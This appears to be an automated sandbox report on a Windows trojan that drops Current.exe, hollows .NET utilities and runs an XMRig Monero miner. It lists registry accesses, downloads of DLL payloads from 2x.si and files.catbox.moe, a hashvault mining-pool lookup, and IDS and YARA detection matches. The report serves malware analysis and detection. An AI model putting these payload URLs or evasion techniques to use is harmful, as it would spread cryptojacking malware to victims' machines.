Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.5:49707 -> 45.11.229.96:39001

Source: global traffic

HTTP traffic detected: GET /o3M.dll HTTP/1.1Host: 2x.siConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 45.76.89.70 45.76.89.70

Source: Joe Sandbox View

ASN Name: AS-CHOOPAUS AS-CHOOPAUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.5:59539 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.5:49718 -> 45.76.89.70:80

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /o3M.dll HTTP/1.1Host: 2x.siConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: strompreis.ru
Source: global traffic	DNS traffic detected: DNS query: 2x.si
Source: global traffic	DNS traffic detected: DNS query: pool.hashvault.pro

Source: powershell.exe, 00000002.00000002.2253526712.00000207AE62F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000002.00000002.2253526712.00000207AE62F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000002.00000002.2239588059.00000207A5F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2197811739.000002079610A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2197811739.000002079610A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: o9OIGsDt4m.exe, 00000000.00000002.2130103490.000001FA0CE27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2197811739.0000020795EE1000.00000004.00000800.00020000.00000000.sdmp, AddInUtil.exe, 00000005.00000002.4570473066.0000023C545E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2197811739.000002079610A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.2197811739.000002079610A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: AddInUtil.exe, 00000005.00000002.4570473066.0000023C54711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://2x.si/o3M.dllE
Source: powershell.exe, 00000002.00000002.2197811739.0000020795EE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.2239588059.00000207A5F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2239588059.00000207A5F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2239588059.00000207A5F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: AddInUtil.exe, 00000005.00000002.4570473066.0000023C54711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/k541xr.dll
Source: AddInUtil.exe, 00000005.00000002.4570473066.0000023C54711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/kwfxr7.dll
Source: powershell.exe, 00000002.00000002.2197811739.000002079610A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2129948515.000001FA0CB20000.00000004.08000000.00040000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C188E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2691830149.000001F95F174000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2129948515.000001FA0CB20000.00000004.08000000.00040000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C188E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C18FC000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2696904592.000001F96F6CC000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2691830149.000001F95F174000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2129948515.000001FA0CB20000.00000004.08000000.00040000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C188E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2691830149.000001F95F174000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000002.00000002.2239588059.00000207A5F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2129948515.000001FA0CB20000.00000004.08000000.00040000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C188E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2691830149.000001F95F174000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2130103490.000001FA0CBF1000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2129948515.000001FA0CB20000.00000004.08000000.00040000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C188E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2167540557.00000226B12E1000.00000004.00000800.00020000.00000000.sdmp, AddInUtil.exe, 00000005.00000002.4570473066.0000023C545E1000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2691830149.000001F95F1D6000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2691830149.000001F95F0B1000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2691830149.000001F95F174000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2129948515.000001FA0CB20000.00000004.08000000.00040000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C188E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: AddInUtil.exe, 00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 00000008.00000002.4560506841.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/benchmark/%s
Source: AddInUtil.exe, 00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 00000008.00000002.4560506841.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: AddInUtil.exe, 00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 00000008.00000002.4560506841.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: AddInUtil.exe, 00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 00000008.00000002.4560506841.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard%s

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709

Source: unknown

HTTPS traffic detected: 172.67.143.156:443 -> 192.168.2.5:49709 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.AddInUtil.exe.23c653b70f0.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 5.2.AddInUtil.exe.23c653b70f0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 5.2.AddInUtil.exe.23c653b70f0.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 8.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 8.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 8.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000008.00000002.4560506841.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: AddInUtil.exe PID: 6044, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: AddInProcess.exe PID: 5808, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown

.NET source code contains very large array initializations

Source: o9OIGsDt4m.exe, WrapperVisitorProperty.cs

Large array initialization: QueryField: array initializer size 671584

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 4_2_00007FF8490C3D8D NtUnmapViewOfSection,		4_2_00007FF8490C3D8D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Code function: 5_2_00007FF8490B7C7D NtUnmapViewOfSection,		5_2_00007FF8490B7C7D

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Code function: 0_2_00007FF848F36260	0_2_00007FF848F36260
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Code function: 0_2_00007FF848F34F38	0_2_00007FF848F34F38
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Code function: 0_2_00007FF848F34D54	0_2_00007FF848F34D54
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Code function: 0_2_00007FF8490B000A	0_2_00007FF8490B000A
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Code function: 0_2_00007FF8490B1018	0_2_00007FF8490B1018
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Code function: 0_2_00007FF8490B5C40	0_2_00007FF8490B5C40
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Code function: 0_2_00007FF8490B0F85	0_2_00007FF8490B0F85
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Code function: 0_2_00007FF8490B2778	0_2_00007FF8490B2778
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF849003332	2_2_00007FF849003332
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 4_2_00007FF848F41F26	4_2_00007FF848F41F26
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 4_2_00007FF848F44F38	4_2_00007FF848F44F38
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 4_2_00007FF848F44D54	4_2_00007FF848F44D54
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 4_2_00007FF8490C0305	4_2_00007FF8490C0305
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 4_2_00007FF8490C1418	4_2_00007FF8490C1418
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 4_2_00007FF8490C0385	4_2_00007FF8490C0385
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 4_2_00007FF8490C03D3	4_2_00007FF8490C03D3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Code function: 5_2_00007FF848F26260	5_2_00007FF848F26260
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Code function: 5_2_00007FF848F21EAD	5_2_00007FF848F21EAD
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Code function: 5_2_00007FF848F24D54	5_2_00007FF848F24D54
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Code function: 5_2_00007FF848F24F38	5_2_00007FF848F24F38
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Code function: 5_2_00007FF849003121	5_2_00007FF849003121
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Code function: 5_2_00007FF8490B53A0	5_2_00007FF8490B53A0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Code function: 5_2_00007FF8490A4BE0	5_2_00007FF8490A4BE0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Code function: 5_2_00007FF8490B46C1	5_2_00007FF8490B46C1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Code function: 5_2_00007FF8490A4EF2	5_2_00007FF8490A4EF2
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F35000	9_2_00007FF848F35000
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F66135	9_2_00007FF848F66135
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F661B5	9_2_00007FF848F661B5
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F6F018	9_2_00007FF848F6F018
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F6F038	9_2_00007FF848F6F038
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F7F2DC	9_2_00007FF848F7F2DC
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F7012D	9_2_00007FF848F7012D
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F70DFA	9_2_00007FF848F70DFA
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F73E38	9_2_00007FF848F73E38
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F70EF2	9_2_00007FF848F70EF2
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F6CD18	9_2_00007FF848F6CD18
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F41C9E	9_2_00007FF848F41C9E
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F414FA	9_2_00007FF848F414FA
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F410FA	9_2_00007FF848F410FA
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F410D1	9_2_00007FF848F410D1
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F414D1	9_2_00007FF848F414D1

Source: Current.exe.0.dr	Static PE information: No import functions for PE file found
Source: o9OIGsDt4m.exe	Static PE information: No import functions for PE file found

Source: o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs o9OIGsDt4m.exe
Source: o9OIGsDt4m.exe, 00000000.00000002.2130103490.000001FA0CBF1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXreiecb.dll" vs o9OIGsDt4m.exe
Source: o9OIGsDt4m.exe, 00000000.00000002.2130103490.000001FA0CBF1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs o9OIGsDt4m.exe
Source: o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1CEF5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXreiecb.dll" vs o9OIGsDt4m.exe
Source: o9OIGsDt4m.exe, 00000000.00000002.2129948515.000001FA0CB20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs o9OIGsDt4m.exe
Source: o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D324000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs o9OIGsDt4m.exe
Source: o9OIGsDt4m.exe, 00000000.00000002.2137039195.000001FA252B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameXreiecb.dll" vs o9OIGsDt4m.exe
Source: o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs o9OIGsDt4m.exe
Source: o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs o9OIGsDt4m.exe
Source: o9OIGsDt4m.exe, 00000000.00000002.2130015050.000001FA0CB80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs o9OIGsDt4m.exe
Source: o9OIGsDt4m.exe	Binary or memory string: OriginalFilenamePmneowsc.exe" vs o9OIGsDt4m.exe

Source: 5.2.AddInUtil.exe.23c653b70f0.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 5.2.AddInUtil.exe.23c653b70f0.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 5.2.AddInUtil.exe.23c653b70f0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 8.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 8.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 8.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000008.00000002.4560506841.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: AddInUtil.exe PID: 6044, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: AddInProcess.exe PID: 5808, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25

Source: o9OIGsDt4m.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Current.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: o9OIGsDt4m.exe, ValClassDeSerializer.cs	Cryptographic APIs: 'CreateDecryptor'
Source: o9OIGsDt4m.exe, ValClassDeSerializer.cs	Cryptographic APIs: 'CreateDecryptor'
Source: o9OIGsDt4m.exe, WrapperVisitorProperty.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.evad.mine.winEXE@11/9@3/3

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe

